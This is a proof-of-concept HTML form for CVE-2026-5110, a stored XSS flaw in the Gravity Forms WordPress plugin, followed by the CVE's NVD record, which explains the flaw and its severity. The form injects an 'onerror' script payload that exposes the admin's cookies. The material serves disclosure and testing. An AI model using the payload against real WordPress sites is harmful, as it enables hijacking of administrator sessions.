CVE-2026-5110

<!-- PoC for CVE-2026-5110 (Gravity Forms Stored XSS) Target: Input field representing SingleProduct inside a Repeater. --> <form action="http://target-wordpress-site/?gf_page=preview" method="POST"> <!-- Form ID and input structure depend on target configuration --> <!-- Simulating a repeater field containing a SingleProduct field --> <input type="hidden" name="gform_submit" value="1"> <!-- Malicious payload injected into the product name field (input_1_1 represents nested structure) --> <input type="text" name="input_1" value="<img src=x onerror=alert(document.cookie)>"> <input type="text" name="input_1_1" value="Product Name"> <input type="submit" value="Submit to Admin"> </form> <!-- Note: The actual request requires mapping the specific field IDs. The vulnerability bypasses validation because the SingleProduct field inside a Repeater does not check the name field for tampering. -->

{"cve": {"id": "CVE-2026-5110", "sourceIdentifier": "[email protected]", "published": "2026-05-02T06:16:03.580", "lastModified": "2026-05-05T19:16:18.390", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gravity Forms plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in versions up to and including 2.10.0. This is due to insufficient input validation and output escaping in the SingleProduct field when used inside a Repeater field. When SingleProduct fields are nested within Repeater fields, the validation flow bypasses the state validation mechanism (failed_state_validation()) that would normally prevent tampering with field values. The validate_subfield() method only calls the field's validate() method, which for SingleProduct fields only validates the quantity field and does not check the product name field for tampering. As a result, an attacker can inject arbitrary HTML and JavaScript into the product name field (input .1). This malicious input is then saved to the database without sanitization because sanitize_entry_value() returns raw values when HTML is not expected for the field type. When an administrator views the entry in wp-admin/admin.php?page=gf_entries, the get_value_entry_detail() method outputs the product name without escaping, causing the stored XSS payload to execute in the administrator's browser. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses an entry containing the malicious payload."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.gravityforms.com/gravityforms-change-log/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f9135799-00db-447d-b795-faafeafbce67?source=cve", "source": "[email protected]"}]}}